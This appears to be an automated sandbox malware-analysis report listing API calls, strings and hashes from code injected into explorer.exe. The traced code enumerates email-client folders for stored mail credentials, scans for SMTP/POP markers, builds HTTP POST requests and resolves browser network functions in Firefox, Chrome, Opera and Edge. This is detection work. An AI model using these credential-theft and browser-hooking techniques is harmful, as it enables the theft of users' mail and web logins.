registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNEL32 ref: 000637B2

Strings

?, xrefs: 000637A2

Memory Dump Source

Source File: 00000013.00000002.509020342.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_61000_explorer.jbxd

Similarity

API ID: Create
String ID: ?
API String ID: 2289755597-1684325040
Opcode ID: 90b71b727ca288489aec266a13dd0a18d59c7ad321cf10e681fca41da4c5c652
Instruction ID: 0175cadc1eaba084e880b185854f7669454e214051596b44bd1488a6f786bdce
Opcode Fuzzy Hash: 90b71b727ca288489aec266a13dd0a18d59c7ad321cf10e681fca41da4c5c652
Instruction Fuzzy Hash: 9E11B970608B4C8FD750DF69D48865AB7E2FB98305F40062EE489C3321DF34D985CB82

Function 000622B4 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32 ref: 000622D0

Memory Dump Source

Source File: 00000013.00000002.509020342.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_61000_explorer.jbxd

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
Instruction ID: 6c511f69b69d8d3de49810070f3f7e1f5989998c8ca95c8496505d4ba7d4b445
Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
Instruction Fuzzy Hash: 7AE08C30108B0A8FD798AFBCE4CA07933A1EB9C252B05093EE005CB114D27988C18741

Analysis Process: explorer.exePID: 2128, Parent PID: 1244COMMON

Execution Graph

Execution Coverage:	15.3%
Dynamic/Decrypted Code Coverage:	96.6%
Signature Coverage:	0%
Total number of Nodes:	233
Total number of Limit Nodes:	7

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0008255C Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1

lstrcatW.KERNEL32(00000000), ref: 00082588
PathAppendW.SHLWAPI(00000000,*.*), ref: 00082594
FindFirstFileW.KERNELBASE(00000000,?,?,000818F4), ref: 000825A8
RtlZeroMemory.NTDLL(00000209,00000209), ref: 000825C3
lstrcatW.KERNEL32(00000209,?), ref: 000825E1
PathAppendW.SHLWAPI(00000209,?), ref: 000825ED
lstrcatW.KERNEL32(00000209,?), ref: 00082611
PathAppendW.SHLWAPI(00000209,?), ref: 0008261D
StrStrIW.SHLWAPI(00000209,?), ref: 0008262C
FindNextFileW.KERNELBASE(00000000,?,?,000818F4), ref: 00082644
FindClose.KERNEL32(00000000,?,000818F4), ref: 00082653

Strings

*.*, xrefs: 0008258E

Memory Dump Source

Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_81000_explorer.jbxd

Similarity

API ID: AppendFindPathlstrcat$FileHeap$AllocateCloseFirstMemoryNextProcessZero
String ID: *.*
API String ID: 1648349226-438819550
Opcode ID: f244eec9a02c202261c54c00ec9b413ed975cdb29ccbfba86f23e8cd56307f5a
Instruction ID: 9ab04f0758e8323f23007aef3f0b497425df495bdb796eec7b4485748527ddf8
Opcode Fuzzy Hash: f244eec9a02c202261c54c00ec9b413ed975cdb29ccbfba86f23e8cd56307f5a
Instruction Fuzzy Hash: C9217171204315AFE710BF209D589AFBBECFFC5B05F04051DFAD1A2251EB389A168B66

Function 00081016 Relevance: 3.0, APIs: 2, Instructions: 19
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000827E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,00082664,?,000818F4), ref: 000827EF

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 0008103A
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00081043

Memory Dump Source

Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_81000_explorer.jbxd

Similarity

API ID: MemoryMoveQuerySectionUnmapViewVirtual
String ID:
API String ID: 1675517319-0
Opcode ID: baec96bfdead2c76f9d40b549b314d090c8656c966da0cfbe969c1d0fccf5cf0
Instruction ID: 55d5dd33b2f901c1089b15beaab3eab97d09ece425fd31eaa01e34cb85dd0178
Opcode Fuzzy Hash: baec96bfdead2c76f9d40b549b314d090c8656c966da0cfbe969c1d0fccf5cf0
Instruction Fuzzy Hash: 23D05E31800260B7EA657774BC1E9CA2A8CBF45730B254251B6E5961D3C9794A818B71

Function 0008104F Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1

ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 0008107F
ExpandEnvironmentStringsW.KERNEL32(%LOCALAPPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 00081093
ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\Microsoft\Outlook,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810A7
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000005,00000000), ref: 000810BB
ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Thunderbird,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810D3
ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\The Bat!,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810E7
ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\The Bat!,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810FB
ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\BatMail,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 0008110F
ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\BatMail,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 00081123
wsprintfA.USER32 ref: 0008116B
ExitProcess.KERNEL32 ref: 00081189

Strings

%APPDATA%\Microsoft\Outlook, xrefs: 0008107A
%LOCALAPPDATA%\Microsoft\Outlook, xrefs: 0008108E
%s,, xrefs: 00081165
%APPDATA%\BatMail, xrefs: 0008110A
%APPDATA%\Thunderbird, xrefs: 000810CE
%APPDATA%\The Bat!, xrefs: 000810E2
%ALLUSERSPROFILE%\The Bat!, xrefs: 000810F6
%ALLUSERSPROFILE%\BatMail, xrefs: 0008111E
%ALLUSERSPROFILE%\Microsoft\Outlook, xrefs: 000810A2

Memory Dump Source

Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_81000_explorer.jbxd

Similarity

API ID: EnvironmentExpandStrings$HeapProcess$AllocateExitFolderPathSpecialwsprintf
String ID: %ALLUSERSPROFILE%\BatMail$%ALLUSERSPROFILE%\Microsoft\Outlook$%ALLUSERSPROFILE%\The Bat!$%APPDATA%\BatMail$%APPDATA%\Microsoft\Outlook$%APPDATA%\The Bat!$%APPDATA%\Thunderbird$%LOCALAPPDATA%\Microsoft\Outlook$%s,
API String ID: 1709485025-1688604020
Opcode ID: 72968f9d89e6bc32a17a9400d13fd263b6a4988c16ccb6dcd1446170f9e16262
Instruction ID: 4a2ba61a2a61d2de802517fd4c21c0c34be2e32a5e302aa0719222a3359143be
Opcode Fuzzy Hash: 72968f9d89e6bc32a17a9400d13fd263b6a4988c16ccb6dcd1446170f9e16262
Instruction Fuzzy Hash: 7331937174022566EA5133654C1AFFF198DBF81FD4B050124F6C9DA2C3DE598E0387B6

Function 0008126E Relevance: 12.4, APIs: 8, Instructions: 365
filesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00081289
GetFileSize.KERNEL32(00000000,00000000), ref: 000812A1
CloseHandle.KERNELBASE(00000000), ref: 000816F4

Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1

ReadFile.KERNELBASE(00000000,00000000,00000400,?,00000000), ref: 000812E8
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0008132D
RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00081379
ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 000813B6

Part of subcall function 00081C39: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081C55

Part of subcall function 00081972: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081994

Sleep.KERNELBASE(00000064), ref: 000816FD

Memory Dump Source

Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_81000_explorer.jbxd

Similarity

API ID: File$MemoryMove$HeapRead$AllocateCloseCreateHandlePointerProcessSizeSleep
String ID:
API String ID: 1032042679-0
Opcode ID: 61bc2f22d2100cfa5cada242e575fdd2c09bc464b337c3e81574e5df978ef6ef
Instruction ID: 75e5417636b9bb59cc4e60b4fe32e97da451ac298a5a535e8d66e3deab824b36
Opcode Fuzzy Hash: 61bc2f22d2100cfa5cada242e575fdd2c09bc464b337c3e81574e5df978ef6ef
Instruction Fuzzy Hash: 9DD1D2746082119BC764BF2888406FABBEABFC8760F48462DF8D597295E7308D53CB95

Function 0008274A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
processstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00082758
Process32First.KERNEL32(00000000,?), ref: 00082777
lstrcmpi.KERNEL32(?,outlook.exe), ref: 0008278B
Process32Next.KERNEL32(00000000,00000128), ref: 000827A8
CloseHandle.KERNELBASE(00000000), ref: 000827B3

Strings

outlook.exe, xrefs: 0008277F

Memory Dump Source

Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_81000_explorer.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
String ID: outlook.exe
API String ID: 868014591-749849299
Opcode ID: 5a2c25bce87a4886a15f15d2e2ef7a80a439fc0a196e4a8c78eb7e8f423e4933
Instruction ID: 343884579346d2584715dea729d65f949d7c5dc94cdf17a98ebe8d79567dd670
Opcode Fuzzy Hash: 5a2c25bce87a4886a15f15d2e2ef7a80a439fc0a196e4a8c78eb7e8f423e4933
Instruction Fuzzy Hash: 23F06230505128ABE720BB65DC49BEE77BCBB48B25F400190E9C9A2191EB388B544F95

Function 00089CF6 Relevance: 3.3, APIs: 2, Instructions: 282
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000015.00000002.512498650.0000000000088000.00000040.80000000.00040000.00000000.sdmp, Offset: 00088000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_88000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0108dd120b053b6f55e8645ecb237e8214c936467551cc72fb4cdbd494caad90
Instruction ID: a463335449e91c4295caeb03356daa0005c9d69c2ec95bec009e1af8dcd402f7
Opcode Fuzzy Hash: 0108dd120b053b6f55e8645ecb237e8214c936467551cc72fb4cdbd494caad90
Instruction Fuzzy Hash: 439137725193914FD726BE78CCC46B5BFE0FB52320B2C06A9D9D1CB386E7A4580AC764

Function 000829B7 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
RtlAllocateHeap.NTDLL(00000000), ref: 000829C1

Memory Dump Source

Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_81000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: b9351f4542ec540c723d8288ffa8f1c93b00f39b480ad427a02778a4ffa0a27d
Instruction ID: 3c8c13ecdc887a9dfa87a418431857bd093085331a36a112817de6aaaa3d87e4
Opcode Fuzzy Hash: b9351f4542ec540c723d8288ffa8f1c93b00f39b480ad427a02778a4ffa0a27d
Instruction Fuzzy Hash: 1CA002B15503005BFD4457F5AE1EA157528B7D4B01F0045447385890549A6955148F21

Function 00082999 Relevance: 2.5, APIs: 2, Instructions: 12
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000827E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,00082664,?,000818F4), ref: 000827EF

GetProcessHeap.KERNEL32(00000000,00000000,00000209,00082664,?,000818F4), ref: 000829A8
HeapFree.KERNEL32(00000000,?,000818F4), ref: 000829AF

Memory Dump Source

Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_81000_explorer.jbxd

Similarity

API ID: Heap$FreeProcessQueryVirtual
String ID:
API String ID: 2580854192-0
Opcode ID: df64934d43702fa617687989b5c70bf43bb8b9b35f146b4e005b86ab177719a1
Instruction ID: 09411c8b402897cefff5f73e0440f262c5ce0b05ffcf0dbc953be38e067b1978
Opcode Fuzzy Hash: df64934d43702fa617687989b5c70bf43bb8b9b35f146b4e005b86ab177719a1
Instruction Fuzzy Hash: ACC02B3100433053DA6037743C1DBC63B0CBF8AB21F050082F9C1970418B6A8C018BB0

Non-executed Functions

Function 00081C39 Relevance: 40.4, APIs: 8, Strings: 15, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1

RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081C55
RtlMoveMemory.NTDLL(00000000,?,?), ref: 00081DBA
RtlZeroMemory.NTDLL(?,?), ref: 00081DD3
StrStrIA.SHLWAPI(00000000,from), ref: 00081DE5
StrStrIA.SHLWAPI(00000000,Blob), ref: 00081DF1
StrStrIA.SHLWAPI(00000000,Pop), ref: 00081DFD
StrStrIA.SHLWAPI(00000000,SMTP), ref: 00081E09
StrStrIA.SHLWAPI(00000000,.pst), ref: 00081E15

Strings

-, xrefs: 00081D29
from, xrefs: 00081DDF
:, xrefs: 00081D24
_, xrefs: 00081D2E
_, xrefs: 00081CBF
., xrefs: 00081CC4
/, xrefs: 00081CB0
Pop, xrefs: 00081DF7
SMTP, xrefs: 00081E03
., xrefs: 00081D33
:, xrefs: 00081CB5
/, xrefs: 00081D1F
Blob, xrefs: 00081DEB
-, xrefs: 00081CBA
.pst, xrefs: 00081E0F

Memory Dump Source

Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_81000_explorer.jbxd

Similarity

API ID: Memory$HeapMove$AllocateProcessZero
String ID: -$-$.$.$.pst$/$/$:$:$Blob$Pop$SMTP$_$_$from
API String ID: 1061763166-3069160855
Opcode ID: b84919368493d7d5f368d1f8ce8e5c1d9a6d62c27fbc89321324b14f0ac629bc
Instruction ID: 4b5aa8aed124a3871e58e12401931c93ac944f0da3ca0bc3fe3e93e69f00f3b1
Opcode Fuzzy Hash: b84919368493d7d5f368d1f8ce8e5c1d9a6d62c27fbc89321324b14f0ac629bc
Instruction Fuzzy Hash: BC5156B0B407165BEB64BA1888A46FE77DEBF85700F084919FDC44B283DB798C474792

Function 00081972 Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 243
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1

RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081994
RtlMoveMemory.NTDLL(00000000,00000000,00000001), ref: 00081B53
RtlZeroMemory.NTDLL(00000000,00000001), ref: 00081B61
StrStrIW.SHLWAPI(00000000,from), ref: 00081B99
StrStrIW.SHLWAPI(00000000,Blob), ref: 00081BA5
StrStrIW.SHLWAPI(00000000,Pop), ref: 00081BB1
StrStrIW.SHLWAPI(00000000,SMTP), ref: 00081BBD
StrStrIW.SHLWAPI(00000000,.pst), ref: 00081BC9
lstrlenW.KERNEL32(00000000), ref: 00081BD0

Strings

Blob, xrefs: 00081B9F
Pop, xrefs: 00081BAB
;, xrefs: 00081B85
from, xrefs: 00081B93
.pst, xrefs: 00081BC3
SMTP, xrefs: 00081BB7
<, xrefs: 00081B7D

Memory Dump Source

Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_81000_explorer.jbxd

Similarity

API ID: Memory$HeapMove$AllocateProcessZerolstrlen
String ID: .pst$;$<$Blob$Pop$SMTP$from
API String ID: 76385412-3831209991
Opcode ID: daa115a76ccc5235f2113b9ee301909c6d2d8d6482403054c7f97d7641e7743b
Instruction ID: 4513c980414ea6726187ff74bc215935d9f5c7d3fe74b3bdc2598ba981a98ec9
Opcode Fuzzy Hash: daa115a76ccc5235f2113b9ee301909c6d2d8d6482403054c7f97d7641e7743b
Instruction Fuzzy Hash: 7B71D2357443129BDB28BF18DD40AEE77E9BF88750F148829E9C19B282DB70DD878791

Function 000820A7 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1

Part of subcall function 00082938: lstrlen.KERNEL32(0061AE26,?,00000000,00000000,000820E3,75712B62,0061AE26,00000000), ref: 00082940
Part of subcall function 00082938: MultiByteToWideChar.KERNEL32(00000000,00000000,0061AE26,00000001,00000000,00000000), ref: 00082952

Part of subcall function 000824CC: RtlZeroMemory.NTDLL(?,00000018), ref: 000824DE

RtlZeroMemory.NTDLL(?,0000003C), ref: 0008213F
wsprintfW.USER32 ref: 00082278
wsprintfW.USER32 ref: 000822E3
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000823AD

Strings

POST, xrefs: 00082229
Content-Type: application/x-www-form-urlencoded, xrefs: 00082307
Host: %s, xrefs: 000822DD
Accept: */*Referer: %S, xrefs: 0008226E

Memory Dump Source

Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_81000_explorer.jbxd

Similarity

API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
API String ID: 4204651544-1701262698
Opcode ID: 2d0a82c8d0d7e4589e8405ce0e55f6720ae0ccaaaabdf10beb67123a4c5655e5
Instruction ID: a01ef7159da9355fa114d69cd7f2b2a9dec58d7afaa36dde2eb3a980ae35fe43
Opcode Fuzzy Hash: 2d0a82c8d0d7e4589e8405ce0e55f6720ae0ccaaaabdf10beb67123a4c5655e5
Instruction Fuzzy Hash: 2DA16AB1608340AFE750EF68D894A6BBBE8FF88750F10092DF9C5D7252DA34DE058B52

Function 00081ECE Relevance: 12.1, APIs: 8, Instructions: 90
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIA.SHLWAPI(00000000,000831D8), ref: 00081EE4
RtlMoveMemory.NTDLL(?,00000000,00000000), ref: 00081F08
RtlMoveMemory.NTDLL(?,?), ref: 00081F22
StrStrIA.SHLWAPI(00000000,?), ref: 00081F31
StrStrIA.SHLWAPI(00000000,?), ref: 00081F44
StrStrIA.SHLWAPI(?,?), ref: 00081F57
lstrlen.KERNEL32(00000000), ref: 00081F64
lstrlen.KERNEL32(00000000), ref: 00081F9D

Memory Dump Source

Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_81000_explorer.jbxd

Similarity

API ID: MemoryMovelstrlen
String ID:
API String ID: 456560858-0
Opcode ID: 7a14b61d49639bded18d49fe900f4b0fc9897078ed695063aad06e24d9f1e285
Instruction ID: 6da4ad79282a5736bd751d79d8e3ad9208539ada28f005c9117f4ca21c0103b0
Opcode Fuzzy Hash: 7a14b61d49639bded18d49fe900f4b0fc9897078ed695063aad06e24d9f1e285
Instruction Fuzzy Hash: 702190725043196ADB30BA649C85FEB7BDCAF85744F000936EBC4C3113E729D94B87A2

Function 00081E44 Relevance: 7.6, APIs: 5, Instructions: 81stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,75A7D250,?,?,00081E22), ref: 00081E5D
CharLowerBuffA.USER32(00000000,00000000), ref: 00081E69
lstrcmpi.KERNEL32(00000000,0061C16C), ref: 00081E81
lstrlen.KERNEL32(00000000,?,00081E22), ref: 00082699
RtlMoveMemory.NTDLL(0061C16C,00000000,00000000), ref: 000826A2

Memory Dump Source

Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_81000_explorer.jbxd

Similarity

API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
String ID:
API String ID: 2826435453-0
Opcode ID: ef267b4f75cccad907b9530f99bc2299fdce0451e31b5f1636dbc808011e4daf
Instruction ID: 01f6e81a6ba3fb045b30a4bd0ba53f7463dec2894d89fef1a73f4158b8aeafa4
Opcode Fuzzy Hash: ef267b4f75cccad907b9530f99bc2299fdce0451e31b5f1636dbc808011e4daf
Instruction Fuzzy Hash: 3221C6B66002105FE710AF24EC849FA77DDFFC9725B10052AEC85C7251D776990687A2

Function 000818F4 Relevance: 6.1, APIs: 4, Instructions: 51fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0008190C
GetFileSize.KERNEL32(00000000,00000000), ref: 0008191C
CloseHandle.KERNEL32(00000000), ref: 00081966

Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1

ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00081941

Part of subcall function 00081C39: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081C55

Part of subcall function 00081972: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081994

Memory Dump Source

Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_81000_explorer.jbxd

Similarity

API ID: File$HeapMemoryMove$AllocateCloseCreateHandleProcessReadSize
String ID:
API String ID: 3402831612-0
Opcode ID: 2be5267b56057d24c1f5efdeeaf95091aebe7c739d2765d28efaa2af9e852935
Instruction ID: 92500d04bea994f5137bb789ba7b1fdb9588a09fa389c957eef6f3e76e100f7c
Opcode Fuzzy Hash: 2be5267b56057d24c1f5efdeeaf95091aebe7c739d2765d28efaa2af9e852935
Instruction Fuzzy Hash: EF01D6323002147BE2213A35DC68EEF7A9DFF86BB4F010629F5D6A21D1DA259D069770

Analysis Process: explorer.exePID: 3196, Parent PID: 1244COMMON

Execution Graph

Execution Coverage:	13.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	223
Total number of Limit Nodes:	16

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00083862 Relevance: 142.1, APIs: 54, Strings: 27, Instructions: 334
libraryloaderstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00083886
GetCurrentProcessId.KERNEL32(00000001), ref: 0008389B
wsprintfA.USER32 ref: 000838B6

Part of subcall function 0008118D: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000811A9
Part of subcall function 0008118D: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000811C1
Part of subcall function 0008118D: lstrlen.KERNEL32(?,00000000), ref: 000811C9
Part of subcall function 0008118D: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000811D4
Part of subcall function 0008118D: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000811EE
Part of subcall function 0008118D: wsprintfA.USER32 ref: 00081205
Part of subcall function 0008118D: CryptDestroyHash.ADVAPI32(?), ref: 0008121E
Part of subcall function 0008118D: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00081228

CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 000838CD
GetLastError.KERNEL32 ref: 000838D3
RtlInitializeCriticalSection.NTDLL(00086038), ref: 000838F3
PathFindFileNameA.SHLWAPI(?), ref: 000838FA
lstrcat.KERNEL32(00085CDE,00000000), ref: 00083910
Sleep.KERNEL32(000001F4), ref: 0008392A
lstrcmpi.KERNEL32(00000000,firefox.exe), ref: 0008393C
GetCommandLineW.KERNEL32(?), ref: 0008394F
GetModuleHandleA.KERNEL32(kernel32.dll,VirtualQuery), ref: 0008397E
GetProcAddress.KERNEL32(00000000), ref: 00083987
GetModuleHandleA.KERNEL32(nspr4.dll,PR_GetDescType), ref: 000839AF
GetProcAddress.KERNEL32(00000000), ref: 000839B2
GetModuleHandleA.KERNEL32(nss3.dll,PR_GetDescType), ref: 000839C4
GetProcAddress.KERNEL32(00000000), ref: 000839C7
GetModuleHandleA.KERNEL32(nspr4.dll,PR_Write), ref: 000839E1
GetProcAddress.KERNEL32(00000000), ref: 000839E4
GetModuleHandleA.KERNEL32(nss3.dll,PR_Write), ref: 000839EC
GetProcAddress.KERNEL32(00000000), ref: 000839EF
lstrcmpi.KERNEL32(00000000,chrome.exe), ref: 00083A6D
GetCommandLineA.KERNEL32(NetworkService), ref: 00083A78
StrStrIA.SHLWAPI(00000000), ref: 00083A7B
lstrcmpi.KERNEL32(00000000,opera.exe), ref: 00083A8E
GetCommandLineA.KERNEL32(NetworkService), ref: 00083A9D
StrStrIA.SHLWAPI(00000000), ref: 00083AA0
GetModuleHandleA.KERNEL32(opera.dll), ref: 00083ABF
GetModuleHandleA.KERNEL32(opera_browser.dll), ref: 00083ACC
CommandLineToArgvW.SHELL32(00000000), ref: 00083956

Part of subcall function 000816C7: GetCurrentProcessId.KERNEL32 ref: 000816D9
Part of subcall function 000816C7: GetCurrentThreadId.KERNEL32 ref: 000816E1
Part of subcall function 000816C7: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000816F1
Part of subcall function 000816C7: Thread32First.KERNEL32(00000000,0000001C), ref: 000816FF
Part of subcall function 000816C7: CloseHandle.KERNEL32(00000000), ref: 00081758

lstrcmpi.KERNEL32(00000000,iexplore.exe), ref: 00083A10
lstrcmpi.KERNEL32(00000000,microsoftedgecp.exe), ref: 00083A20
lstrcmpi.KERNEL32(00000000,msedge.exe), ref: 00083A30
GetCommandLineA.KERNEL32(NetworkService), ref: 00083A47
StrStrIA.SHLWAPI(00000000), ref: 00083A4A
GetModuleHandleA.KERNEL32(chrome.dll), ref: 00083A5F
GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestA), ref: 00083B2C
GetProcAddress.KERNEL32(00000000), ref: 00083B35
GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestW), ref: 00083B52
GetProcAddress.KERNEL32(00000000), ref: 00083B55
GetModuleHandleA.KERNEL32(wininet.dll,InternetWriteFile), ref: 00083B72
GetProcAddress.KERNEL32(00000000), ref: 00083B75
